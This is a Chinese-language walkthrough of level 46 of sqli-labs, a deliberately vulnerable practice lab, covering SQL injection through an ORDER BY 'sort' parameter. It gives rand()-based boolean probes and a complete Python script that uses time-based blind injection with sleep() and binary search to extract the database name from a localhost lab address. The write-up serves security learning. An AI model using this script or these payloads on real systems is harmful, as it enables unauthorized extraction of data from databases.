sql-labs第46关 脚本盲注

我们直接可以从界面中得知传参的参数为SORT

查看源码

我们令参数即sort为1尝试输入:即 ?sort=1

令参数即sort为2

看到按照字母顺序进行了排序,所以使用了order by语句。

用 rand()盲注 这里首先假设给true以及false两个来观察回显

?sort=rand(true)

?sort=rand(false)

看到给的值为真以及假是不一样的,所以我们可以构造出一个布尔盲注或者延时盲注

?sort=rand(ascii(mid((select database()),1,1))>114)

用py脚本进行盲注

代码如下

python 复制代码
import requests
import time


def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
        	# 构造时间盲注
            payload = "if((ascii(substr(database(),%d,1))>%d),sleep(1),1)" % (i, mid)
            params = {"sort": payload}
            start_time = time.time()
            try:
                r = requests.get(url, params=params, timeout=20)
            except requests.Timeout:
                print("Request timed out.")
                continue
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)


if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-46/index.php'
    inject_database(url)

这里我们可以看到使用脚本代码爆出了数据库名

相关推荐
不羁。。6 小时前
【撸靶笔记】第八关:GET - Blind - Boolian Based - Single Quotes
数据库·sql·mybatis
AwhiteV7 小时前
利用图数据库高效解决 Text2sql 任务中表结构复杂时占用过多大模型上下文的问题
数据库·人工智能·自然语言处理·oracle·大模型·text2sql
m0_595199857 小时前
Redis(以Django为例,含具体操作步骤)
数据库·redis·缓存
爱尚你19937 小时前
MySQL 三大日志:redo log、undo log、binlog 详解
数据库·mysql
小猿姐9 小时前
KubeBlocks AI:AI时代的云原生数据库运维探索
数据库·人工智能·云原生·kubeblocks
NocoBase10 小时前
10 个开源工具,快速构建数据应用
数据库·低代码·开源
麻辣清汤11 小时前
结合BI多维度异常分析(日期-> 商家/渠道->日期(商家/渠道))
数据库·python·sql·finebi
Kan先生12 小时前
对象存储解决方案:MinIO 的架构与代码实战
数据库·python
超级迅猛龙12 小时前
保姆级Debezium抽取SQL Server同步kafka
数据库·hadoop·mysql·sqlserver·kafka·linq·cdc
杨过过儿13 小时前
【Task02】:四步构建简单rag(第一章3节)
android·java·数据库